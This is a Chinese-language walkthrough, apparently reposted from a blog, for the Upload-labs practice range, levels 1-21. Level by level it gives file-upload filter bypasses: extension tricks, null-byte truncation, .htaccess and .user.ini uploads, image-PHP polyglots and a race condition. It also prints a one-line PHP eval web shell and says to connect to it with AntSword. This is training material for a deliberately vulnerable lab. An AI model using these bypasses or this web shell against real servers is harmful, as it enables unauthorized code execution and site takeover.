Upload-labs 1-21关 靶场通关攻略(全网最全最完整)

本文主要是介绍Upload-labs 1-21关 靶场通关攻略(全网最全最完整)，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

Pass-01

步骤一：将一个php文件重命名为jpg文件

步骤二：上传1.jpg抓包，将后改为php，放行

步骤三：图片右键新建标签页打开图片，复制图片地址去蚁剑连接

Pass-02

步骤一：上传1.jpg抓包，将后改为php，放行

步骤二：图片右键新建标签页打开图片，复制图片地址去蚁剑连接

Pass-03

步骤一：php文件重命名为1.php5

步骤二：上传1.php5文件，图片右键新建标签页打开图片，复制图片地址去蚁剑连接

Pass-04

步骤一：创建一个.htaccess文件，里面输入内容<FilesMatch "1.jpg">
SetHandler application/x-httpd-php</FilesMatch>

步骤二：先上传.htaccess文件，再上传1.jpg，图片右键新建标签页打开图片

Pass-05

步骤一：创建一个.user.ini文件，输入内容auto_prepend_file = "1.jpg"

步骤二：先上传.user,ini文件，再上传1.jpg，访问http://127.0.0.1/upload/upload/readme.php

Pass-06

步骤一：上传1.php抓包,将1.php改为1.phP，放行

步骤二：图片右键新建标签页打开图片

Pass-07

步骤一：上传1.php抓包,将1.php后面加空格，放行

步骤二：图片右键新建标签页打开图片

Pass-08

步骤一：上传1.php抓包,将1.php后面加.，放行

步骤二：图片右键新建标签页打开图片

Pass-09

步骤一：上传1.php抓包,将1.php后面加::$DATA，放行

步骤二：图片右键新建标签页打开图片

Pass-10

步骤一：上传1.php文件抓包，1.php后面加.空格. 放行

步骤二：图片右键新建标签页打开图片

Pass-11

步骤一：将1.php改为1.pphphp

步骤二：上传1.pphphp文件，图片右键新建标签页打开图片

Pass-12

步骤一：上传1.php文件抓包，将/upload/后面添加随便一个php文件%00，1.php改为1.jpg 放行

步骤二：图片右键新建标签页打开图片，删掉�/9320240830163621.jpg访问

Pass-13

步骤一：上传1.php文件抓包，将/upload/后面添加随便一个php文件加空格，1.php改为1.jpg

步骤二：打开Hex，将6.php后面的空格对应的20改为00，放行

步骤三：图片右键新建标签页打开图片，删掉�/5320240830164829.jpg访问

Pass-14

步骤一：将一张图片和一个php文件放在cmd根目录，运行copy a.jpg/b+1.php/a shell.jpg

步骤二：上传shell.jpg，图片右键新建标签页打开图片，打开文件包含漏洞,用file读取图片地址

Pass-15

步骤一：上传shell.jpg，图片右键新建标签页打开图片，打开文件包含漏洞,用file读取图片地址

Pass-16

环境不支持

Pass-17

步骤一：图片需要二次渲染，上传图片，图片右键新建标签页打开图片，打开文件包含漏洞,用file读取图片地址

步骤二：复制地址去蚁剑连接

Pass-18

步骤一：php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤一：上传文件，burp抓包，发送到 intruder 模块，设置⽆限发送空的payloads，无限重复；

步骤二：访问1.php抓包，发送到 intruder 模块，设置⽆限发送空的payloads，无限重复；

步骤三：同时攻击，直到出现webshell.php

步骤四：访问webshell.php,使用蚁剑连接

Pass-20

步骤一：上传php文件，保存名称改为1.php/.

步骤二：图片右键新建标签页打开图片

这篇关于Upload-labs 1-21关 靶场通关攻略(全网最全最完整)的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---